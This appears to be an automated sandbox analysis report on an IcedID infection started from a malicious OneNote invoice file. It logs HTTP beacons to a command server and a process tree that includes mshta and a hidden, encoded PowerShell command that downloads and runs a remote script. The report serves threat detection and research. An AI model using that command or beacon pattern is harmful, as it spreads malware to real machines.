                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            95192.168.2.44979145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:58.265455008 CET2230OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:58.430542946 CET2230INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:58 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            96192.168.2.44979245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:58.767972946 CET2231OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:58.935139894 CET2232INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:58 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            97192.168.2.44979345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:59.758327007 CET2233OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:59.932435036 CET2233INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:59 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            98192.168.2.44979445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:00.271239996 CET2234OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:00.439152956 CET2234INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:00 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            99192.168.2.44979545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:18:00.981710911 CET2235OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:18:01.149549961 CET2235INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:18:01 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Statistics

                                                                                                                                            CPU Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            Memory Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            High Level Behavior Distribution

                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                            Behavior

                                                                                                                                            Click to jump to process

                                                                                                                                            System Behavior

                                                                                                                                            General

                                                                                                                                            Target ID:0
                                                                                                                                            Start time:21:15:56
                                                                                                                                            Start date:02/02/2023
                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Inv_02_02_#6.one
                                                                                                                                            Imagebase:0x1040000
                                                                                                                                            File size:1676072 bytes
                                                                                                                                            MD5 hash:8D7E99CB358318E1F38803C9E6B67867
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate

                                                                                                                                            General

                                                                                                                                            Target ID:1
                                                                                                                                            Start time:21:16:00
                                                                                                                                            Start date:02/02/2023
                                                                                                                                            Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Local\Temp\Open.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                                            Imagebase:0x1150000
                                                                                                                                            File size:13312 bytes
                                                                                                                                            MD5 hash:7083239CE743FDB68DFC933B7308E80A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.311152361.0000000000F81000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                                                            • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000001.00000003.311152361.0000000000F81000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.311152361.0000000000F81000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.311152361.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.312205007.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000001.00000003.311641542.0000000000F87000.00000004.00000020.00020000.00000000.sdmp, Author: Arnim Rupp
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.311641542.0000000000F87000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000001.00000002.313533229.0000000001006000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.313533229.0000000001006000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.313384693.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000001.00000003.311100035.000000000101A000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.311100035.000000000101A000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000001.00000002.313116250.0000000000E35000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.313116250.0000000000E35000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.311641542.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.312521057.0000000000FB3000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000001.00000003.311100035.0000000001006000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.311100035.0000000001006000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000001.00000002.313533229.000000000101A000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.313533229.000000000101A000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.312537602.0000000000F88000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.313356114.0000000000F88000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Target ID:2
                                                                                                                                            Start time:21:16:01
                                                                                                                                            Start date:02/02/2023
                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAHIAcwBhAG4AYQB2AGUALgB0AG8AcAAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=
                                                                                                                                            Imagebase:0xd90000
                                                                                                                                            File size:232960 bytes
                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Target ID:3
                                                                                                                                            Start time:21:16:01
                                                                                                                                            Start date:02/02/2023
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7c72c0000
                                                                                                                                            File size:625664 bytes
                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Target ID:4
                                                                                                                                            Start time:21:16:02
                                                                                                                                            Start date:02/02/2023
                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAHIAcwBhAG4AYQB2AGUALgB0AG8AcAAvAGcAYQB0AGUAZgAuAHAAaABwACIAKQA=
                                                                                                                                            Imagebase:0x1180000
                                                                                                                                            File size:430592 bytes
                                                                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000003.420275209.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000004.00000002.430208816.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.430208816.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000004.00000002.433111959.0000000004E41000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.433111959.0000000004E41000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000003.391815288.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.431747574.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.430799760.0000000000958000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.430489689.0000000000880000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000004.00000002.453050206.0000000006E88000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000004.00000002.430799760.0000000000950000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.430799760.0000000000950000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000004.00000002.433111959.0000000004E04000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.433111959.0000000004E04000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000004.00000002.430799760.00000000009F5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Target ID:5
                                                                                                                                            Start time:21:16:20
                                                                                                                                            Start date:02/02/2023
                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:/tsr
                                                                                                                                            Imagebase:0xe90000
                                                                                                                                            File size:157872 bytes
                                                                                                                                            MD5 hash:DBCFA6F25577339B877D2305CAD3DEC3
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate

                                                                                                                                            General

                                                                                                                                            Target ID:9
                                                                                                                                            Start time:21:16:56
                                                                                                                                            Start date:02/02/2023
                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\MZvYng.bin,init
                                                                                                                                            Imagebase:0x1220000
                                                                                                                                            File size:61952 bytes
                                                                                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Target ID:10
                                                                                                                                            Start time:21:16:56
                                                                                                                                            Start date:02/02/2023
                                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\MZvYng.bin,init
                                                                                                                                            Imagebase:0x7ff715d20000
                                                                                                                                            File size:69632 bytes
                                                                                                                                            MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.541445122.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.594455037.0000017521BC2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.555534226.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_6, Description: Yara detected IcedID, Source: 0000000A.00000002.835726070.0000017521B3B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000002.835726070.0000017521B3B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_IcedID_11d24d35, Description: unknown, Source: 0000000A.00000002.835726070.0000017521B3B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: Windows_Trojan_IcedID_0b62e783, Description: unknown, Source: 0000000A.00000002.835726070.0000017521B3B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: Windows_Trojan_IcedID_91562d18, Description: unknown, Source: 0000000A.00000002.835726070.0000017521B3B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: Windows_Trojan_IcedID_48029e37, Description: unknown, Source: 0000000A.00000002.835726070.0000017521B3B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.721823197.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.560733182.0000017521BC2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.531693872.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.612994519.0000017521BC1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.497608477.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: Windows_Trojan_IcedID_0b62e783, Description: unknown, Source: 0000000A.00000002.836538938.0000017523531000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: Windows_Trojan_IcedID_91562d18, Description: unknown, Source: 0000000A.00000002.836538938.0000017523531000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: Windows_Trojan_IcedID_48029e37, Description: unknown, Source: 0000000A.00000002.836538938.0000017523531000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.543079236.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.536679847.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.584413640.0000017521BC2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 0000000A.00000003.500443586.0000017521BBE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
